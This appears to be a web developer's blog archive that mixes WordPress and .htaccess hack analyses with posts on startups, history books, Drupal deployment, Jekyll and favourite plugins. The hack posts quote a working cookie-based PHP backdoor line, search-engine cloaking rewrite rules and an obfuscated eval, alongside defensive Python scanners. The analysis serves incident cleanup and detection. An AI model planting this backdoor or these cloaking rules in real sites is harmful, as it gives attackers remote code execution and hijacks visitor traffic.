New WP Hack


So this new one hit me pretty hard today. With a normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and I was beginning to question what was what when, lo and behold, in the Google SERP: This site may be hacked.

Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set. 

All files were touched by the hack. The line

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

was added to each core file. index.php, .htaccess and a file in the root called post.php were altered/added respectively. Because of their size I put them up on github at:

Yep, this server was rooted.
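As an added example (not code from the post), here is a Python scanner that walks a site tree and flags the pattern above: an element of a request superglobal being invoked as a function, which is what turns a cookie into an arbitrary function call. The post only shows the $_COOKIE form; also matching $_GET, $_POST and $_REQUEST is a generalization on my part. The sample files it builds are constructed, and the clean one reads $_GET the ordinary way to show the check does not fire on normal superglobal use.

```python
import os
import re
import tempfile

# A request superglobal element used as a callable, e.g. the line from the post:
#   if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
# The post shows $_COOKIE; also matching $_GET/$_POST/$_REQUEST is an
# assumption about variants, not something the post reports.
CALLABLE_SUPERGLOBAL = re.compile(
    r"""\$_(?:COOKIE|GET|POST|REQUEST)\s*\[\s*['"][^'"]+['"]\s*\]\s*\("""
)


def scan_file(path):
    """Return [(line_number, stripped_line)] for every hit in one file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            if CALLABLE_SUPERGLOBAL.search(line):
                hits.append((lineno, line.strip()))
    return hits


def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Walk root and return {relative_path: hits} for files that contain hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_site():
    """Constructed WordPress-like tree: two infected files, one clean file."""
    root = tempfile.mkdtemp(prefix="wp_sample_")
    os.makedirs(os.path.join(root, "wp-includes"))
    infected = (
        "<?php\n"
        'if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);\n'
        "/* the file's normal code follows */\n"
    )
    # ordinary read of a superglobal as a value, not as a callable
    clean = "<?php\n$version = isset($_GET['v']) ? $_GET['v'] : 'none';\n"
    for rel, body in [("index.php", infected),
                      ("wp-includes/load.php", infected),
                      ("wp-includes/version.php", clean)]:
        with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, hits in sorted(scan_tree(build_sample_site()).items()):
        for lineno, text in hits:
            print(f"{path}:{lineno}: {text}")
```

Run it against the document root of a real site instead of the sample tree and diff the hit list against a known-good copy of core; every core file that shows up is one to restore from a clean download rather than edit by hand.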




Start Up Idea


Here is my start up idea:

We provide companies with Razor scooters, ping pong tables, beer kegs, pretty people with nice teeth, and a photographer. We show up, have a party, take pictures and you can post them online to show how cutting edge you are.

It’s a win/win. You get to market what a cool company you have without actually having all those stupid distractions, and I make money off your stupidity thinking that’s what it takes to market a cool company.

This idea is for sale. $400. Yes, you can just take the idea, but I’ll put a Gypsy curse on you, if you do. For your piece of mind, $400 is pretty cheap.

King of Kings :: addendum


You have finished the latest Dan Carlin epic cast: King of Kings, including that 5 hour finale! Now what? You want more, but are unsure where to turn? How about some extra material to help you dig into the history.



History on Fire Podcast
History professor Daniele Bolelli
The 10,000 part 1
The 10,000 part 2






Gates of Fire: An Epic Novel of the Battle of Thermopylae
Steven Pressfield

Cannot recommend this enough. Great read! 5 stars from me on Amazon.





The Ten Thousand: A Novel of Ancient Greece
Michael Curtis Ford

I read this book about 2 years ago, and enjoyed it.






If you have other reads or podcasts you would like to see added to this, please let me know in the comments below.

.htaccess compromised



A simple, clean, flat HTML site was recently hacked for its search engine referrer traffic. Arriving at the site by typing the domain, or via some secondary link, would serve the site without issue. Arriving via a search engine, or with a search engine user agent, well, that’s a paddlin’.


Here’s the .htaccess file

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]
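Before following the trail into that script, here is an added example (Python, not from the post) that checks an .htaccess file for exactly this shape of rule: a RewriteRule whose RewriteCond lines key on the user agent or referer of a search engine and send the request somewhere else. It treats a rule with a “-” target (the form deny/block rules use) as not cloaking, so a legitimate bad-bot block is not reported. The sample text is the file from the post followed by two benign rules I constructed for contrast; the generic crawler words added to the list are my own.

```python
import re

# Words that identify search-engine traffic in the post's conditions, plus a
# few generic crawler words added here as an assumption about common variants.
SEARCH_ENGINE_WORDS = ("google", "yahoo", "msn", "aol", "bing", "bot", "crawl", "slurp")

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{([\w:]+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_cloaking_rules(htaccess_text):
    """Return one finding per RewriteRule whose preceding RewriteConds test the
    user agent or referer for a search engine and whose target is a real
    rewrite (not '-', which deny/block rules use)."""
    findings = []
    pending = []  # RewriteCond lines waiting for their RewriteRule
    for line in htaccess_text.splitlines():
        m = COND_RE.match(line)
        if m:
            pending.append({"var": m.group(1).upper(), "pattern": m.group(2),
                            "flags": m.group(3) or ""})
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        pattern, target, flags = m.group(1), m.group(2), m.group(3) or ""
        se_conds = [c for c in pending
                    if c["var"] in ("HTTP_USER_AGENT", "HTTP_REFERER")
                    and any(w in c["pattern"].lower() for w in SEARCH_ENGINE_WORDS)]
        if se_conds and target != "-":
            findings.append({"conditions": se_conds, "rule_pattern": pattern,
                             "target": target, "flags": flags})
        pending = []  # conditions apply only to the first following RewriteRule
    return findings


# The rules from the post, followed by two constructed benign rules for contrast.
SAMPLE_HTACCESS = """RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]

# constructed: blocking a scraper is a deny rule, not cloaking
RewriteCond %{HTTP_USER_AGENT} (badbot|scraper) [NC]
RewriteRule ^ - [F]
# constructed: an ordinary redirect with no conditions
RewriteRule ^old-page$ /new-page [R=301,L]
"""

if __name__ == "__main__":
    for f in find_cloaking_rules(SAMPLE_HTACCESS):
        keyed_on = ", ".join(c["var"] for c in f["conditions"])
        print(f"search-engine conditional rewrite: {keyed_on} -> {f['target']}")
```

The point of the check is the combination, not either half on its own: conditions on HTTP_USER_AGENT or HTTP_REFERER are normal, and rewrites to a PHP handler are normal, but a rewrite that fires only for search engines is why the site looked fine to a person typing the domain and hacked to Google.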

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

[Screenshot: the source of details-enforcers.php]

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable, $meymun, is fancy-speak for create_function. So the line

$qweboi = $meymun('$a',strrev(';)a$(lave'));

becomes an anonymous function, lambda_1. Then on the next line we see a strrev(), because nothing is as secure as reversing a string. So let’s do it: Hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:


That sends content. The domain?

You know they are good because they use 1’s for i’s and zero’s for o’s.
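The two tricks above, strrev() around the create_function body and base64_encode() around the domain, are both just string transforms, so they can be unwound without ever executing the script. As an added example (not the post's code), here is a small Python evaluator for PHP string expressions built from literals, “.” concatenation and strrev/base64_decode/str_rot13; it parses the expression and applies the functions statically. The create_function body is the one from the post; the domain is a constructed placeholder, since the real one is not reproduced here, and the nested strrev-inside-base64 sample is my own construction.

```python
import base64
import codecs
import re

# Tokens: PHP string literals, function names, and ( ) , .
TOKEN_RE = re.compile(
    r"""\s*(?:('(?:[^'\\]|\\.)*')|("(?:[^"\\]|\\.)*")|([A-Za-z_]\w*)|([().,]))"""
)

# String functions the unwinder understands; each maps a string to a string.
FUNCS = {
    "strrev": lambda s: s[::-1],
    "base64_decode": lambda s: base64.b64decode(s).decode("latin-1"),
    "str_rot13": lambda s: codecs.encode(s, "rot13"),
    "strtolower": str.lower,
}


def unquote(literal):
    """Strip the quotes and resolve the escapes PHP honours in that quote style."""
    body, quote = literal[1:-1], literal[0]
    if quote == "'":
        return re.sub(r"\\(['\\])", r"\1", body)
    simple = {"n": "\n", "t": "\t", "r": "\r", '"': '"', "\\": "\\", "$": "$"}
    return re.sub(r"\\(.)", lambda m: simple.get(m.group(1), m.group(0)), body)


def tokenize(src):
    tokens, pos = [], 0
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if not m:
            raise ValueError(f"unexpected input at {pos}: {src[pos:pos + 12]!r}")
        pos = m.end()
        if m.group(1) or m.group(2):
            tokens.append(("str", unquote(m.group(0).lstrip())))
        elif m.group(3):
            tokens.append(("name", m.group(3)))
        else:
            tokens.append(("punct", m.group(4)))
    return tokens


def parse_expr(tokens, i):
    """expr := term ('.' term)*   (PHP string concatenation)"""
    value, i = parse_term(tokens, i)
    while i < len(tokens) and tokens[i] == ("punct", "."):
        rhs, i = parse_term(tokens, i + 1)
        value += rhs
    return value, i


def parse_term(tokens, i):
    """term := string | func '(' expr ')'"""
    kind, text = tokens[i]
    if kind == "str":
        return text, i + 1
    if kind == "name" and text.lower() in FUNCS:
        if i + 1 >= len(tokens) or tokens[i + 1] != ("punct", "("):
            raise ValueError(f"expected '(' after {text}")
        arg, i = parse_expr(tokens, i + 2)
        if i >= len(tokens) or tokens[i] != ("punct", ")"):
            raise ValueError("expected ')'")
        return FUNCS[text.lower()](arg), i + 1
    raise ValueError(f"unsupported token {text!r}")


def unwrap(src):
    """Statically evaluate a PHP string expression made of literals,
    concatenation and the functions in FUNCS; nothing is executed."""
    tokens = tokenize(src.strip().rstrip(";"))
    value, i = parse_expr(tokens, 0)
    if i != len(tokens):
        raise ValueError("trailing tokens after expression")
    return value


# Constructed stand-in for the hidden domain; the real one is not reproduced.
CONSTRUCTED_DOMAIN = "examp1e-d0main.test"
CONSTRUCTED_B64 = base64.b64encode(CONSTRUCTED_DOMAIN.encode()).decode()

SAMPLES = {
    "lambda body": "strrev(';)a$(lave')",                       # from the post
    "domain": f"base64_decode('{CONSTRUCTED_B64}')",            # constructed
    "nested": f"base64_decode(strrev('{CONSTRUCTED_B64[::-1]}'))",  # constructed
}

if __name__ == "__main__":
    for label, expr in SAMPLES.items():
        print(f"{label}: {expr}  ->  {unwrap(expr)!r}")
```

The unwinder refuses anything it does not know (a variable, an unknown function), which is the behaviour you want when triaging a script of this kind: the moment it stops is the moment the obfuscation layer ends and real logic begins, and that is where to read the code by hand rather than run it.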





never an Always


If you are in the Drupal world you will have seen the critical updates to several modules. One of these is in our install profile. This isn’t a matter of turning off the module either. Update, or remove.

It doesn’t take me long to clean the module out of the repo and push it up, but with well over 50 sites to maintain, I don’t have a lot of time to play. Luckily the other 50 or so sites are on multisite machines, so that’s just one code base to play with. But let’s get back to brass tacks here:

I have multiple people that commit to these sites, some in house and others the clients themselves. With all this noise, one voice always rings true: Master Can Always Be Pushed to Production.

I hear what you are saying: “Of course it can, silly!”

With that I will say: Sometimes, every now and then, when things just don’t work the way they are supposed to, when the needs of the client outweigh the needs of the community, a kitten can be killed. And if core can be hacked, then can master be not-production-ready? You betcha’.

Yes, Dorothy, it is a scary world.

So when you hear someone say that master can Always be pushed up, remember that there is never an Always.

Heckle the Jekyll


I love / love / love the idea of static pages over CMS driven systems for small sites. (Even front pages of large sites, but that is another discussion!) That being said I have been bitten by the Jekyll bug, and I’m finding it a rather annoying itch.

Another idea I love is speed. Give me a fast website and I’ll be happy. Hence the love for static sites over CMS, and all that overhead.

Back to Jekyll: For a test site I set up CloudIntel. It’s a simple site used to promote the sale of the domain (and its sister .net domain) and is scoring a 90 on Google’s Speed Insight. Of course that shouldn’t be that hard since it is such a simple site.

The site is hosted on Github and it’s working fine, so I guess I must change something. Let’s change everything.

Gitlab has me intrigued. Mainly the Free Private Repos. Sure, github is getting my $7/month, and I have a page, but according to the fine print regs, I can only have one page. With Gitlab I can push out small sites with glee.

Well, maybe not glee. More on that in a minute.


During some random research on speeding up a WordPress site I came across Impatient Jekyll.

Blazing fast rendering Strongly optimized so that you start with high score on Google Page Speed Insights, and an excellent SpeedIndex on

Another Change

So everything seems fine. An optimized Jekyll, a new host. Let’s pile on.

Add: Gulp

And now it’s broken. I think it is a gulp deploy as the hook is for github, not gitlab. Using git I can push up the site, and it all goes up, save the css. This is a common issue and has been driving me up the wall.

Looks like I’ve got some fun planned for the weekend.



WP Plugins


I was asked to do a review for a plugin and it got me thinking. Nearly every week I have a WordPress site cross my desk, usually with a security issue, and in turn I install the same plugins. I thought it would be interesting to share the couple that I use, and see if there are any favorites out there from you that you would like to share.

  1. ShortPixel
  2. Sucuri (some sites)
  3. W3 Total Cache
  4. Simple 301 Redirects & Bulk Uploader
  5. WP Database Backup (or if I can’t install a plugin)
  6. Adminer (Not a plugin)

You’ll note that Sucuri does not get put on all sites, and Adminer is not a plugin, and if it is put on the site, it is only temporary.

The big ones for me are ShortPixel, which is an image compressor, the W3 Total Cache and both of the 301 Redirects. These plugins help with page speed and working with the SEO team.

The Database Backup/Adminer options are there for db access. Before I do any work on a site a snapshot is taken of the db. Adminer is a stand-alone PHP script for accessing MySQL databases. Yes, there are times when I only have FTP access, no plugin or other access to work in the site. I can hear you: “But Eric, if you have FTP can’t you ….?” You’d be surprised, just like I was when I would FTP a plugin up only to have it deleted by the security software on the server. Sometimes this job is a challenge🙂

But enough of my rambling. I’m sure I’m missing some, that I’ll add later.

What are your goto plugins?